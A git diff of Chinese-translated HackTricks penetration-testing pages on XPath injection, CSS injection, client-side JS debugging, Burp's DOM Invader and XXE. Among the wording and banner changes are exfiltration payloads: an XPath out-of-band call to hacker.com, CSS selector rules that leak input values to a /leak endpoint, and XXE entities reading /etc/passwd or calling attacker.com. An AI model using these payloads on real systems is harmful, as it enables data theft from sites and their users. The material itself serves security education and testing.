* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
* [https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_(OTG-INPVAL-010)](https://wiki.owasp.org/index.php/Testing\_for\_XPath\_Injection\_\(OTG-INPVAL-010\))
@ -295,15 +296,30 @@ doc-available(concat("http://hacker.com/oob/", RESULTS))
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

File diff suppressed because it is too large Load diff

File diff suppressed because it is too large Load diff

View file

@ -1,18 +1,19 @@
# CSS注入代码
# CSS 注入代码
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
{% code title="victim.html" %}
```html
@ -196,7 +197,6 @@ input[value$="4"]{--e0:url(http://localhost:5001/leak?post=4)}
input[value$="5"]{--e0:url(http://localhost:5001/leak?post=5)}
input[value$="6"]{--e0:url(http://localhost:5001/leak?post=6)}
input[value$="7"]{--e0:url(http://localhost:5001/leak?post=7)}
```html
input[value$="8"]{--e0:url(http://localhost:5001/leak?post=8)}
input[value$="9"]{--e0:url(http://localhost:5001/leak?post=9)}
input[value$="a"]{--e0:url(http://localhost:5001/leak?post=a)}
@ -228,16 +228,17 @@ input[value=]{list-style:url(http://localhost:5001/end?token=&)};
```
{% endcode %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

File diff suppressed because it is too large Load diff

View file

@ -1,39 +1,40 @@
# 调试客户端JS
# 调试客户端 JS
## 调试客户端JS
## 调试客户端 JS
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
调试客户端JS可能会很麻烦因为每次更改URL包括使用的参数或参数值的更改都需要**重置断点并重新加载页面**
调试客户端 JS 可能很麻烦,因为每次更改 URL包括参数或参数值的更改您需要 **重置断点并重新加载页面**
### `debugger;`
如果在JS文件中放置`debugger;`一行,当**浏览器**执行JS时它将在那个位置**停止****调试器**。因此,设置常量断点的一种方法是**将所有文件下载到本地并在JS代码中设置断点**
如果您在 JS 文件中放置 `debugger;` 这一行,当 **浏览器** 执行 JS 时,它会在该位置 **停止** **调试器**。因此,设置常量断点的一种方法是 **将所有文件下载到本地并在 JS 代码中设置断点**
### 覆盖
浏览器覆盖允许拥有将要执行的代码的本地副本并执行该本地副本,而不是来自远程服务器的副本。\
您可以在“开发者工具” --> “源” --> “覆盖”中**访问覆盖**
浏览器覆盖允许您拥有即将执行的代码的本地副本,并执行该副本,而不是远程服务器上的代码。\
您可以在 "开发者工具" --> "源" --> "覆盖" 中 **访问覆盖**
您需要**创建一个本地空文件夹来存储覆盖**,因此只需创建一个新的本地文件夹并将其设置为该页面的覆盖。
您需要 **创建一个本地空文件夹以存储覆盖**,所以只需创建一个新的本地文件夹并在该页面中将其设置为覆盖。
然后,在“开发者工具” --> “源”中**选择要覆盖的文件**,然后用**右键单击选择“保存以覆盖”**
然后,在 "开发者工具" --> "源" 中 **选择您想要覆盖的文件**,并 **右键单击选择 "保存为覆盖"**
![](<../../.gitbook/assets/image (742).png>)
这将**在本地复制JS文件**,您将能够在浏览器中**修改该副本**。因此,只需在您想要的任何位置添加**`debugger;`**命令,**保存**更改并**重新加载**页面,每次访问该网页时**将加载您的本地JS副本**,并保持您的调试器命令在其位置:
这将 **在本地复制 JS 文件**,您将能够 **在浏览器中修改该副本**。所以只需在您想要的地方添加 **`debugger;`** 命令,**保存** 更改并 **重新加载** 页面,每次访问该网页时 **您的本地 JS 副本将被加载**,并且您的调试命令将保持在其位置:
![](<../../.gitbook/assets/image (594).png>)
@ -41,16 +42,17 @@
* [https://www.youtube.com/watch?v=BW\_-RCo9lo8\&t=1529s](https://www.youtube.com/watch?v=BW\_-RCo9lo8\&t=1529s)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASSHackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,95 +1,96 @@
# DOM Invader
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## DOM Invader
DOM Invader是一个安装在Burp内置浏览器中的浏览器工具。它使用各种来源和汇聚点包括Web消息和原型污染来帮助**检测DOM XSS漏洞**。该工具作为扩展预安装。
DOM Invader 是一个安装在 Burp 内置浏览器中的浏览器工具。它通过各种来源和接收点(包括网络消息和原型污染)来**检测 DOM XSS 漏洞**。该工具作为扩展预安装。
DOM Invader集成了一个选项卡位于浏览器的DevTools面板中可实现以下功能:
DOM Invader 在浏览器的 DevTools 面板中集成了一个选项卡,支持以下功能:
1. 用于DOM XSS测试的网页上**可控汇聚点的识别**,提供上下文和清理详细信息
2. 通过`postMessage()`方法**记录、编辑和重新发送Web消息**用于DOM XSS测试。DOM Invader还可以使用特制的Web消息自动检测漏洞。
3. 检测**客户端原型污染**源并扫描发送到风险汇聚点的可控小工具。
4. 识别**DOM覆盖漏洞**。
1. **识别网页上的可控接收点**,用于 DOM XSS 测试,提供上下文和清理细节
2. **记录、编辑和重新发送通过 `postMessage()` 方法发送的网络消息**,用于 DOM XSS 测试。DOM Invader 还可以使用特别构造的网络消息自动检测漏洞。
3. 检测 **客户端原型污染** 来源,并扫描发送到风险接收点的可控小工具。
4. 识别 **DOM 覆盖漏洞**
### 启用
### 启用
在Burp的内置浏览器中转到**Burp扩展**并启用它:
Burp 的内置浏览器中,转到 **Burp 扩展** 并启用它:
<figure><img src="../../.gitbook/assets/image (1129).png" alt=""><figcaption></figcaption></figure>
现在刷新页面,在**Dev Tools**中您将找到**DOM Invader选项卡**
现在刷新页面,在 **Dev Tools** 中你会找到 **DOM Invader 选项卡:**
<figure><img src="../../.gitbook/assets/image (695).png" alt=""><figcaption></figcaption></figure>
### 注入一个Canary
### 注入一个 Canary
上图中,您可以看到一个**随机组合的字符即Canary**。现在您应该开始在网页的不同部分参数、表单、URL等中**注入**它并每次单击搜索。DOM Invader将检查**Canary是否出现在任何有趣的汇聚点**中,这些汇聚点可能会被利用。
前面的图像中,你可以看到一个 **随机字符组,这就是 Canary**。你现在应该开始在网页的不同部分参数、表单、URL...)中 **注入**并每次点击搜索。DOM Invader 将检查 **canary 是否结束于任何有趣的接收点**,可能被利用。
此外,选项**注入URL参数**和**注入表单**将自动打开一个**新标签页**,在其中**注入Canary**到它找到的每个**URL**参数和**表单**中
此外,选项 **Inject URL params** 和 Inject forms 将自动打开一个 **新选项卡****注入** 每个找到的 **URL** 参数和 **表单** 中的 **canary**
### 注入一个空的Canary
### 注入一个空的 Canary
如果您只想找到页面可能具有的汇聚点,即使它们不可利用,您可以**搜索一个空的Canary**
如果你只想找到页面可能存在的潜在接收点,即使它们不可利用,你可以 **搜索一个空的 canary**
### 发送消息
DOM Invader允许使用Web消息进行DOM XSS测试,具有以下功能:
DOM Invader 允许使用网络消息测试 DOM XSS,具有以下功能:
1. 通过`postMessage()`发送的**记录Web消息**类似于Burp Proxy的HTTP请求/响应历史记录
2. **修改**和**重新发出**Web消息以手动测试DOM XSS类似于Burp Repeater的功能。
3. 用于探测DOM XSS的**自动更改**和发送Web消息
1. **记录通过 `postMessage()` 发送的网络消息**,类似于 Burp Proxy 的 HTTP 请求/响应历史记录日志
2. **修改****重新发送** 网络消息以手动测试 DOM XSS类似于 Burp Repeater 的功能。
3. **自动更改** 和发送网络消息以探测 DOM XSS
#### 消息详情
单击任何消息可查看有关每条消息的详细信息其中包括客户端JavaScript是否访问消息的`origin`、`data`或`source`属性。
通过点击每条消息,可以查看详细信息,包括客户端 JavaScript 是否访问了消息的 `origin`、`data` 或 `source` 属性。
* **`origin`**:如果消息的**来源信息未经检查**,您可能能够从**任意外部域**向事件处理程序发送跨源消息。但如果已检查,则仍可能存在不安全性
* **`data`**:这是发送有效载荷的位置。如果不使用此数据,则汇聚点无效
* **`source`**评估源属性是否经过验证通常引用一个iframe而不是来源。即使已检查也不能保证验证不会被绕过。
* **`origin`** : 如果 **消息的来源信息未检查**,你可能能够从 **任意外部域** 向事件处理程序发送跨域消息。但如果进行了检查,仍然可能不安全
* **`data`**: 这是发送有效负载的地方。如果此数据未使用,则接收点无用
* **`source`**: 评估源属性,通常引用一个 iframe是否经过验证而不是来源。即使进行了检查也不能保证验证无法被绕过。
#### 回复消息
1. 从**消息**视图中,单击任何消息以打开消息详细信息对话框。
2. 根据需要编辑**数据**字段。
3. 单击**发送**
1. 从 **消息** 视图中,点击任何消息以打开消息详情对话框。
2. 根据需要编辑 **数据** 字段。
3. 点击 **发送**
### 原型污染
DOM Invader还可以搜索**原型污染漏洞**。首先,您需要启用它:
DOM Invader 还可以搜索 **原型污染漏洞**。首先,你需要启用它:
<figure><img src="../../.gitbook/assets/image (1026).png" alt=""><figcaption></figcaption></figure>
然后,它将**搜索源**,使您能够向**`Object.prototype`**添加任意属性。
然后,它将 **搜索来源**,使你能够向 **`Object.prototype`** 添加任意属性。
如果找到任何内容,将出现一个**测试**按钮以**测试找到的源**。单击它,将出现一个新标签页,在控制台中创建一个对象并检查`testproperty`是否存在:
如果找到任何内容,将出现一个 **测试** 按钮以 **测试找到的来源**。点击它,将出现一个新选项卡,在控制台中创建一个对象并检查 `testproperty` 是否存在:
```javascript
let b = {}
b.testproperty
```
一旦找到源,您可以**扫描小工具**
一旦你找到一个源,你可以**扫描小工具**
1. 单击**DOM**视图中任何已识别的原型污染源旁边找到的**扫描小工具**按钮时DOM Invader会打开一个新标签页开始扫描适合的小工具。
2. 与此同时,在同一标签中,**DOM Invader**标签应在DevTools面板中打开。扫描完成后通过已识别的小工具可访问的任何漏洞点将显示在**DOM**视图中。例如,下面的示例显示了一个名为`html`的小工具属性被传递给`innerHTML`漏洞点。
1. 当点击**扫描小工具**按钮时DOM Invader会在**DOM**视图中任何已识别的原型污染源旁边打开一个新标签。然后开始扫描合适的小工具。
2. 与此同时,在同一标签中,**DOM Invader**标签应在DevTools面板中打开。扫描完成后通过已识别的小工具访问的任何接收点将在**DOM**视图中显示。例如,下面的示例中显示了一个名为`html`的小工具属性被传递到`innerHTML`接收点。
## DOM篡改
## DOM覆盖
上一张图片中可以看到可以打开DOM篡改扫描。完成后**DOM Invader将开始搜索DOM篡改漏洞**。
前面的图像中可以看到DOM覆盖扫描可以被启用。一旦完成**DOM Invader将开始搜索DOM覆盖漏洞**。
## 参考资料
## 参考
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling)
@ -98,16 +99,17 @@ b.testproperty
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution)
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering)
{% hint style="success" %}
学习与实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家ARTE**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家GRTE**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,42 +1,43 @@
# XXE - XEE - XML外部实体
# XXE - XEE - XML External Entity
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## XML基础
## XML 基础
XML是一种为数据存储和传输而设计的标记语言具有灵活的结构允许使用描述性命名的标签。它与HTML不同之处在于不受限于一组预定义的标签。尽管XML最初在AJAX技术中发挥了作用但随着JSON的兴起XML的重要性已经下降。
XML 是一种用于数据存储和传输的标记语言,具有灵活的结构,允许使用描述性命名的标签。它与 HTML 的不同之处在于不受限于一组预定义标签。尽管 XML 在 AJAX 技术中的初始作用显著,但随着 JSON 的兴起,其重要性已下降。
- **通过实体表示数据**XML中的实体使数据的表示成为可能包括特殊字符如`&lt;`和`&gt;`,它们分别对应于`<`和`>`以避免与XML的标签系统发生冲突。
- **定义XML元素**XML允许定义元素类型概述元素应该如何结构化以及它们可以包含的内容从任何类型的内容到特定子元素。
- **文档类型定义DTD**DTD在XML中至关重要用于定义文档的结构和其可以包含的数据类型。它们可以是内部的、外部的或两者结合指导文档的格式化和验证方式。
- **自定义和外部实体**XML支持在DTD中创建自定义实体以灵活表示数据。使用URL定义的外部实体在安全方面存在问题特别是在XML外部实体XXE攻击的背景下这些攻击利用XML解析器处理外部数据源的方式:`<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
- **使用参数实体检测XXE**为了检测XXE漏洞特别是当由于解析器的安全措施而导致传统方法失败时可以利用XML参数实体。这些实体允许使用带外检测技术例如触发DNS查找或向受控域发起HTTP请求,以确认漏洞。
- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
- `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`
* **通过实体表示数据**XML 中的实体使得数据的表示成为可能,包括特殊字符如 `&lt;``&gt;`,它们分别对应于 `<``>`,以避免与 XML 的标签系统发生冲突。
* **定义 XML 元素**XML 允许定义元素类型,概述元素应如何结构化以及可以包含哪些内容,从任何类型的内容到特定的子元素。
* **文档类型定义 (DTD)**DTD 在 XML 中对于定义文档的结构和可以包含的数据类型至关重要。它们可以是内部的、外部的或两者的组合,指导文档的格式和验证方式。
* **自定义和外部实体**XML 支持在 DTD 中创建自定义实体,以实现灵活的数据表示。外部实体通过 URL 定义,尤其在 XML 外部实体 (XXE) 攻击的背景下引发安全问题,这些攻击利用 XML 解析器处理外部数据源的方式:`<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
* **使用参数实体检测 XXE**:为了检测 XXE 漏洞,特别是在常规方法因解析器安全措施而失败时,可以利用 XML 参数实体。这些实体允许使用带外检测技术,例如触发 DNS 查找或向受控域发出 HTTP 请求,以确认漏洞。
* `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
* `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`
## 主要攻击
[**这些攻击大多数是使用出色的Portswiggers XEE实验室进行测试的https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe)
[**这些攻击大多是在出色的 Portswiggers XEE 实验室测试的https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe)
### 新实体测试
这次攻击中,我将测试一个简单的新实体声明是否有效。
此攻击中,我将测试一个简单的新 ENTITY 声明是否有效。
```xml
<?xml version="1.0" encoding="UTF-8"?>
